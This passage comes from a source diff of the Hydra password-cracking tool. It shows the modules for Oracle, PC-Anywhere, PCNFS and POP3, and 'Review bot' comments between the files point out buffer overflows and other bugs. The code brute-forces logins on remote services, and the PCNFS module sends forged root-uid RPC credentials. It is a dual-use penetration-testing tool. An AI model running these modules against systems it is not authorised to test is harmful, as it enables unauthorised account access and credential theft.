hydra_report(stderr, "[VERBOSE] database: oracle_error: %s\n", o_errormsg);
}
if (strstr((const char *) o_errormsg, "ORA-12514") != NULL) {
hydra_report(stderr, "[ERROR] ORACLE SID is not valid, you should try to enumerate them.\n");
}
if (strstr((const char *) o_errormsg, "ORA-28000") != NULL) {
hydra_report(stderr, "[ERROR] ORACLE account %s is locked.\n", login);
}
if (o_error) {
OCIHandleFree((dvoid *) o_error, OCI_HTYPE_ERROR);
}
hydra_completed_pair();
//by default, set in sqlnet.ora, the trace file is generated in pwd to log any errors happening,
//as we don't care, we are deleting the file
//set these parameters to not generate the file
//LOG_DIRECTORY_CLIENT = /dev/null
//LOG_FILE_CLIENT = /dev/null
unlink("sqlnet.log");
return 2;
} else {
OCILogoff(o_servicecontext, o_error);
if (o_error) {
OCIHandleFree((dvoid *) o_error, OCI_HTYPE_ERROR);
}
hydra_report_found_host(port, ip, "oracle", fp);
hydra_completed_pair_found();
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_oracle(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ORACLE;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
if ((miscptr == NULL) || (strlen(miscptr) == 0)) {
//SID is required as miscptr
hydra_report(stderr, "[ERROR] Oracle SID is required, using ORCL as default\n");
miscptr = "ORCL";
}
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
next_run = start_oracle(sock, ip, port, options, miscptr, fp);
hydra_child_exit(0);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#endif
int service_oracle_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
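
Review bot: print_oracle_error() calls OCIErrorGet() on o_error, but in start_oracle() that handle is only allocated by the OCIHandleAlloc() call that comes after OCIInitialize() and both OCIEnvInit() calls, so the first three failure paths query an error handle that does not exist yet. Report those failures with a fixed message instead, and drop the second OCIEnvInit() call, which repeats the first with identical arguments and differs only in its label "OCIEnvInit 2". The return codes also go unused: start_oracle() returns 4 on setup failure and 2 on a failed login, but case 2 of service_oracle() calls `hydra_child_exit(0);` on the line after the assignment to next_run, and the switch has no case 4, so a setup failure ends the child with status 0. Finally, `unlink("sqlnet.log");` removes whatever file of that name sits in the current directory; the comment above it already names the LOG_DIRECTORY_CLIENT and LOG_FILE_CLIENT settings, which avoid creating the file in the first place.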

286
hydra-pcanywhere.c Normal file

@ -0,0 +1,286 @@
//This plugin was written by <david dot maciejak at kyxar dot fr>
//
//PC-Anywhere authentication protocol test on Symantec PC-Anywhere 10.5
//
// no memleaks found on 110425
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
int pcadebug = 0;
int send_cstring(int s, char *crypted_string) {
char buffer2[100], *bptr = buffer2;
char clientcryptheader[] = "\x06";
memset(buffer2, 0, sizeof(clientcryptheader));
bptr = buffer2;
buffer2[0] = 6;
bptr++;
buffer2[1] = strlen(crypted_string);
bptr++;
strcpy(bptr, crypted_string);
return hydra_send(s, buffer2, 2 + strlen(crypted_string), 0);
}
void show_buffer(char *buffer, int size) {
int i;
printf("size: %d, buffer:\n", size);
for (i = 0; i < size; i++) {
printf("%c", buffer[i]);
}
printf("\n");
}
void clean_buffer(char *buf, int size) {
int i;
for (i = 0; i < size; i++) {
int pos = buf[i];
if (pos < 32 || pos > 126) {
// . char
buf[i] = 46;
}
}
}
void print_encrypted_str(char *str) {
int i;
printf("encode string: ");
for (i = 0; i < strlen(str); i++) {
printf("%x ", str[i]);
}
printf("\n");
}
void pca_encrypt(char *cleartxt) {
char passwd[128];
int i;
strcpy(passwd, cleartxt);
if (strlen(cleartxt) > 0) {
passwd[0] = (passwd[0] ^ 0xab);
for (i = 1; i < strlen(passwd); i++)
passwd[i] = passwd[i - 1] ^ passwd[i] ^ (i - 1);
passwd[strlen(passwd)] = '\0';
strcpy(cleartxt, passwd);
}
}
void pca_decrypt(char *password) {
char cleartext[128];
int i;
if (strlen(password) > 0) {
cleartext[0] = password[0] ^ 0xab;
for (i = 1; i < strlen(password); i++)
cleartext[i] = password[i - 1] ^ password[i] ^ (i - 1);
cleartext[strlen(password)] = '\0';
strcpy(password, cleartext);
}
}
void debugprintf(char *msg) {
if (pcadebug)
printf("debug: %s\n", msg);
}
int start_pcanywhere(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass;
char buffer[2048] = "";
char clogin[128] = "";
char cpass[128] = "";
int ret, i;
char *client[4];
char *server[5];
int clientsize[4];
client[0] = "\x00\x00\x00\x00";
clientsize[0] = 4;
client[1] = "\x6F\x06\xff";
clientsize[1] = 3;
client[2] = "\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00";
clientsize[2] = 14;
client[3] = "\x6f\x62\x01\x02\x00\x00\x00";
clientsize[3] = 7;
server[0] = "nter";
server[1] = "\x1B\x61";
server[2] = "\0x1B\0x62";
server[3] = "Enter login name";
server[4] = "denying connection";
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
debugprintf("dans pcanywhere start");
/*printf("testing %s:%s\n",login,pass); */
strcpy(clogin, login);
strcpy(cpass, pass);
pca_encrypt(clogin);
pca_encrypt(cpass);
for (i = 0; i < 4; i++) {
if (hydra_send(s, client[i], clientsize[i], 0) < 0) {
return 1;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret == -1) {
return 1;
}
if (i == 3) {
if (ret == 3) {
/*one more to get the login prompt */
ret = hydra_recv(s, buffer, sizeof(buffer));
}
}
if (i == 0 || i == 3)
clean_buffer(buffer, ret);
/*show_buffer(buffer,ret); */
if (i == 2) {
clean_buffer(buffer, ret);
if (strstr(buffer, server[i + 2]) != NULL) {
fprintf(stderr, "[ERROR] PC Anywhere host denying connection because you have requested a lower encrypt level\n");
return 3;
}
}
if (strstr(buffer, server[i]) == NULL) {
if (i == 3) {
debugprintf("problem receiving login banner");
}
return 1;
}
}
if (send_cstring(s, clogin) < 0) {
return 1;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret == -1) {
return 1;
}
clean_buffer(buffer, ret);
/*show_buffer(buffer,ret); */
if (strstr(buffer, "Enter password:") == NULL) {
debugprintf("problem receiving password banner");
return 1;
}
if (send_cstring(s, cpass) < 0) {
return 1;
}
ret = hydra_recv(s, buffer, sizeof(buffer));
if (ret == -1) {
return 1;
}
clean_buffer(buffer, ret);
/*show_buffer(buffer,ret); */
if ((strstr(buffer, "Invalid login") != NULL) || (strstr(buffer, "Enter password") != NULL)) {
debugprintf("login/passwd wrong");
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
} else {
debugprintf("cool find login/passwd");
hydra_report_found_host(port, ip, "pcanywhere", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
return 1;
}
void service_pcanywhere(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_PCANYWHERE, mysslport = PORT_PCANYWHERE_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
usleep(275000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
case 2:
next_run = start_pcanywhere(sock, ip, port, options, miscptr, fp);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_pcanywhere_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
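
Review bot: `server[2] = "\0x1B\0x62";` in start_pcanywhere() uses the wrong escape: "\0" is a NUL byte followed by the literal characters x1B, so as a C string server[2] is empty and `strstr(buffer, server[i])` at i == 2 always succeeds. The line above it shows the intended form, `server[1] = "\x1B\x61";`, so this should be "\x1B\x62". The buffer handling also needs bounds: login and pass are copied with strcpy() into clogin[128] and cpass[128], pca_encrypt() copies again into passwd[128], and send_cstring() then strcpy()s the result into buffer2[100] at offset 2, so anything longer than 97 bytes overruns buffer2 and anything longer than 127 overruns the earlier buffers. Reject or truncate over-long input once, before encoding. Note too that the XOR in pca_encrypt() can produce a zero byte, and both that loop and send_cstring() take their length from strlen(), so such a value is silently cut short; carry the original length alongside the buffer. Both branches of the final if/else return before the trailing `return 1;`, which is unreachable.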

198
hydra-pcnfs.c Normal file

@ -0,0 +1,198 @@
#include "hydra-mod.h"
/* pcnfs stuff copied from prout.c */
extern char *HYDRA_EXIT;
char *buf;
#define LEN_HDR_RPC 24
#define LEN_AUTH_UNIX 72+12
/* RPC common hdr */
struct rpc_hdr { /* 24 */
unsigned long xid;
unsigned long type_msg;
unsigned long version_rpc;
unsigned long prog_id;
unsigned long prog_ver;
unsigned long prog_proc;
};
struct pr_auth_args {
unsigned long len_clnt;
char name[64];
unsigned long len_id;
char id[32];
unsigned long len_passwd;
char passwd[64];
unsigned long len_comments;
char comments[255];
};
#define LEN_HDR_PCN_AUTH sizeof(struct pr_auth_args)
/* Lets start ... */
int start_pcnfs(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[LEN_HDR_RPC + LEN_AUTH_UNIX + LEN_HDR_PCN_AUTH];
char *ptr, *pkt = buffer;
unsigned long *authp;
struct timeval tv;
struct rpc_hdr *rpch;
struct pr_auth_args *prh;
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
memset(pkt, 0, sizeof(buffer));
rpch = (struct rpc_hdr *) (pkt);
authp = (unsigned long *) (pkt + LEN_HDR_RPC);
prh = (struct pr_auth_args *) (pkt + LEN_HDR_RPC + LEN_AUTH_UNIX);
rpch->xid = htonl(0x32544843);
rpch->type_msg = htonl(0);
rpch->version_rpc = htonl(2);
rpch->prog_id = htonl(150001);
rpch->prog_ver = htonl(2);
rpch->prog_proc = htonl(13); /* PCNFSD_PROC_PRAUTH */
prh->len_clnt = htonl(63);
prh->len_id = htonl(31);
prh->len_passwd = htonl(63);
prh->len_comments = htonl(254);
strcpy(prh->comments, " Hydra - THC password cracker - visit http://www.thc.org - use only allowed for legal purposes ");
strcpy(prh->name, "localhost");
ptr = prh->id;
while (*login) {
*ptr++ = (*login ^ 0x5b) & 0x7f;
login++;
}
*ptr = 0;
ptr = prh->passwd;
while (*pass) {
*ptr++ = (*pass ^ 0x5b) & 0x7f;
pass++;
}
*ptr = 0;
gettimeofday(&tv, (struct timezone *) NULL);
*(authp) = htonl(1); /* auth unix */
*(++authp) = htonl(LEN_AUTH_UNIX - 16); /* length auth */
*(++authp) = htonl(tv.tv_sec); /* local time */
*(++authp) = htonl(9); /* length host */
strcpy((char *) ++authp, "localhost"); /* hostname */
authp += (3); /* len(host)%4 */
*(authp) = htonl(0); /* uid root */
*(++authp) = htonl(0); /* gid root */
*(++authp) = htonl(9); /* 9 gid grps */
/* group root, bin, daemon, sys, adm, disk, wheel, floppy, "user gid" */
*(++authp) = htonl(0);
*(++authp) = htonl(1);
*(++authp) = htonl(2);
*(++authp) = htonl(3);
*(++authp) = htonl(4);
*(++authp) = htonl(6);
*(++authp) = htonl(10);
*(++authp) = htonl(11);
*(++authp) = htonl(0);
if (hydra_send(s, buffer, sizeof(buffer), 0) < 0) {
fprintf(stderr, "[ERROR] Could not send data to remote server, reconnecting ...\n");
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL) {
fprintf(stderr, "[ERROR] Timeout from remote server, reconnecting ...\n");
return 1;
}
/* analyze the output */
if (buf[2] != 'g' || buf[5] != 32) {
fprintf(stderr, "[ERROR] RPC answer status : bad proc/version/auth\n");
free(buf);
return 3;
}
if (buf[27] == 32 && buf[28] == 32 && buf[29] == 32) {
hydra_report_found_host(port, ip, "pcnfs", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
} else {
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
}
return 1;
}
void service_pcnfs(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
hydra_register_socket(sp);
if (port == 0) {
fprintf(stderr, "[ERROR] pcnfs module called without -s port!\n");
hydra_child_exit(0);
}
if ((options & OPTION_SSL) != 0) {
fprintf(stderr, "[ERROR] pcnfs module can not be used with SSL!\n");
hydra_child_exit(0);
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
next_run = 0;
switch (run) {
case 1: /* connect and service init function */
{
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(275000);
if ((sock = hydra_connect_udp(ip, port)) < 0) {
fprintf(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
next_run = 2;
break;
}
case 2: /* run the cracking function */
next_run = start_pcnfs(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
fprintf(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_pcnfs_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
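
Review bot: struct rpc_hdr and the authp pointer in start_pcnfs() use `unsigned long` for what are 32-bit wire fields; the `/* 24 */` annotation and `#define LEN_HDR_RPC 24` only hold where unsigned long is 4 bytes. Where it is 8 bytes the six header fields span 48 bytes and run into the auth area that starts at pkt + LEN_HDR_RPC, each `*(++authp)` advances 8 bytes instead of 4, and struct pr_auth_args changes size as well, so the packet layout is wrong. Use uint32_t for every on-the-wire field and for authp. The two obfuscation loops (`*ptr++ = (*login ^ 0x5b) & 0x7f;` and the same for pass) copy until the terminating NUL with no limit, although prh->id is 32 bytes and prh->passwd is 64; stop at sizeof(prh->id) - 1 and sizeof(prh->passwd) - 1. The reply is then indexed at buf[2], buf[5] and buf[27] to buf[29] without checking how many bytes were received.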

771
hydra-pop3.c Normal file

@ -0,0 +1,771 @@
#include "hydra-mod.h"
#include "sasl.h"
//openssl s_client -starttls pop3 -crlf -connect 192.168.0.10:110
typedef struct pool_str {
char ip[36];
/* int port;*/// not needed
int pop3_auth_mechanism;
int disable_tls;
struct pool_str *next;
} pool;
extern char *HYDRA_EXIT;
char *buf;
char apop_challenge[300] = "";
pool *plist = NULL, *p = NULL;
/* functions */
int service_pop3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port);
pool *list_create(pool data) {
pool *p;
if (!(p = malloc(sizeof(pool))))
return NULL;
memcpy(p->ip, data.ip, 36);
//p->port = data.port;
p->pop3_auth_mechanism = data.pop3_auth_mechanism;
p->disable_tls = data.disable_tls;
p->next = NULL;
return p;
}
pool *list_insert(pool data) {
pool *newnode;
newnode = list_create(data);
newnode->next = plist;
plist = newnode->next; // to be sure!
return newnode;
}
pool *list_find(char *ip) {
pool *node = plist;
while (node != NULL) {
if (memcmp(node->ip, ip, 36) == 0)
return node;
node = node->next;
}
return NULL;
}
/* how to know when to release the mem ?
-> well, after _start has determined which pool number it is */
int list_remove(pool * node) {
pool *save, *list = plist;
int ok = -1;
if (list == NULL || node == NULL)
return -2;
do {
save = list->next;
if (list != node)
free(list);
else
ok = 0;
list = save;
} while (list != NULL);
return ok;
}
char *pop3_read_server_capacity(int sock) {
char *ptr = NULL;
int resp = 0;
char *buf = NULL;
do {
if (buf != NULL)
free(buf);
ptr = buf = hydra_receive_line(sock);
if (buf != NULL) {
/*
exchange capa:
+OK
UIDL
STLS
*/
if (strstr(buf, "\r\n.\r\n") != NULL && buf[0] == '+') {
resp = 1;
/* we got the capability info then get the completed warning info from server */
while (hydra_data_ready(sock)) {
free(buf);
buf = hydra_receive_line(sock);
}
} else {
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
if (*(ptr) == '.' || *(ptr) == '-')
resp = 1;
}
}
} while (buf != NULL && resp == 0);
return buf;
}
int start_pop3(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "\"\"";
char *login, *pass, buffer[500], buffer2[500];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s) > 0) {
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
free(buf);
}
switch (p->pop3_auth_mechanism) {
#ifdef LIBOPENSSL
case AUTH_APOP:{
MD5_CTX c;
unsigned char md5_raw[MD5_DIGEST_LENGTH];
int i;
char *pbuffer = buffer2;
MD5_Init(&c);
MD5_Update(&c, apop_challenge, strlen(apop_challenge));
MD5_Update(&c, pass, strlen(pass));
MD5_Final(md5_raw, &c);
for (i = 0; i < MD5_DIGEST_LENGTH; i++) {
sprintf(pbuffer, "%02x", md5_raw[i]);
pbuffer += 2;
}
sprintf(buffer, "APOP %s %s\r\n", login, buffer2);
}
break;
#endif
case AUTH_LOGIN:{
sprintf(buffer, "AUTH LOGIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, login);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
}
break;
case AUTH_PLAIN:{
sprintf(buffer, "AUTH PLAIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 PLAIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
memset(buffer, 0, sizeof(buffer));
sasl_plain(buffer, login, pass);
sprintf(buffer, "%.250s\r\n", buffer);
}
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
case AUTH_CRAMSHA1:
case AUTH_CRAMSHA256:{
int rc = 0;
char *preplogin;
rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
switch (p->pop3_auth_mechanism) {
case AUTH_CRAMMD5:
sprintf(buffer, "AUTH CRAM-MD5\r\n");
break;
case AUTH_CRAMSHA1:
sprintf(buffer, "AUTH CRAM-SHA1\r\n");
break;
case AUTH_CRAMSHA256:
sprintf(buffer, "AUTH CRAM-SHA256\r\n");
break;
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
//get the one-time BASE64 encoded challenge
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
switch (p->pop3_auth_mechanism) {
case AUTH_CRAMMD5:
hydra_report(stderr, "[ERROR] POP3 CRAM-MD5 AUTH : %s\n", buf);
break;
case AUTH_CRAMSHA1:
hydra_report(stderr, "[ERROR] POP3 CRAM-SHA1 AUTH : %s\n", buf);
break;
case AUTH_CRAMSHA256:
hydra_report(stderr, "[ERROR] POP3 CRAM-SHA256 AUTH : %s\n", buf);
break;
}
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 2);
free(buf);
memset(buffer2, 0, sizeof(buffer2));
switch (p->pop3_auth_mechanism) {
case AUTH_CRAMMD5:{
sasl_cram_md5(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
case AUTH_CRAMSHA1:{
sasl_cram_sha1(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
case AUTH_CRAMSHA256:{
sasl_cram_sha256(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
}
break;
}
hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer));
sprintf(buffer, "%.250s\r\n", buffer);
free(preplogin);
}
break;
case AUTH_DIGESTMD5:{
sprintf(buffer, "AUTH DIGEST-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 DIGEST-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf);
free(buf);
if (verbose)
hydra_report(stderr, "[VERBOSE] S: %s\n", buffer);
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "pop", NULL, 0, NULL);
if (buffer2 == NULL)
return 3;
if (verbose)
hydra_report(stderr, "[VERBOSE] C: %s\n", buffer2);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
//Send auth request
sprintf(buffer, "AUTH NTLM\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 NTLM AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
//send auth and receive challenge
//send auth request: lst the server send it's own hostname and domainname
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
sprintf(buffer, "%s\r\n", buf1);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
//recover challenge
from64tobits((char *) buf1, buf + 2);
free(buf);
//Send response
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "%s\r\n", buf1);
}
break;
default:
sprintf(buffer, "USER %.250s\r\n", login);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 4;
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] POP3 protocol or service shutdown: %s\n", buf);
free(buf);
return (3);
}
free(buf);
sprintf(buffer, "PASS %.250s\r\n", pass);
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL) {
return 4;
}
if (buf[0] == '+') {
hydra_report_found_host(port, ip, "pop3", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
/* special AS/400 hack */
if (strstr(buf, "CPF2204") != NULL || strstr(buf, "CPF22E3") != NULL || strstr(buf, "CPF22E4") != NULL || strstr(buf, "CPF22E5") != NULL) {
hydra_completed_pair_skip();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_pop3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, i;
char *ptr = NULL;
//extract data from the pool, ip is the key
if (plist == NULL)
if (service_pop3_init(ip, sp, options, miscptr, fp, port) != 0)
hydra_child_exit(2);
p = list_find(ip);
if (p == NULL) {
hydra_report(stderr, "[ERROR] Could not find ip %s in pool\n", hydra_address2string(ip));
return;
}
if (list_remove(p) != 0)
hydra_report(stderr, "[ERROR] Could not find ip %s in pool to free memory\n", hydra_address2string(ip));
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
sock = hydra_connect_tcp(ip, port);
} else {
sock = hydra_connect_ssl(ip, port);
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
buf = hydra_receive_line(sock);
if (buf == NULL || buf[0] != '+') { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an POP3 protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
}
ptr = strstr(buf, "<");
if (ptr != NULL && buf[0] == '+') {
if (ptr[strlen(ptr) - 1] == '\n')
ptr[strlen(ptr) - 1] = 0;
if (ptr[strlen(ptr) - 1] == '\r')
ptr[strlen(ptr) - 1] = 0;
strcpy(apop_challenge, ptr);
}
free(buf);
#ifdef LIBOPENSSL
if (!p->disable_tls) {
/* check for STARTTLS, if available we may have access to more basic auth methods */
hydra_send(sock, "STLS\r\n", strlen("STLS\r\n"), 0);
buf = hydra_receive_line(sock);
if (buf[0] != '+') {
hydra_report(stderr, "[ERROR] TLS negotiation failed, no answer received from STARTTLS request\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
p->disable_tls = 1;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
}
}
#endif
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_pop3(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_pop3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int myport = PORT_POP3, mysslport = PORT_POP3_SSL;
char *ptr = NULL;
int sock = -1;
char *capa_str = "CAPA\r\n";
char *quit_str = "QUIT\r\n";
pool p;
p.pop3_auth_mechanism = AUTH_CLEAR;
p.disable_tls = 1;
memcpy(p.ip, ip, 36);
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(p.ip, myport);
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(p.ip, mysslport);
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] pid %d terminating, can not connect\n", (int) getpid());
return -1;
}
buf = hydra_receive_line(sock);
if (buf == NULL || buf[0] != '+') { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an POP3 protocol or service shutdown: %s\n", buf);
return -1;
}
ptr = strstr(buf, "<");
if (ptr != NULL && buf[0] == '+') {
if (ptr[strlen(ptr) - 1] == '\n')
ptr[strlen(ptr) - 1] = 0;
if (ptr[strlen(ptr) - 1] == '\r')
ptr[strlen(ptr) - 1] = 0;
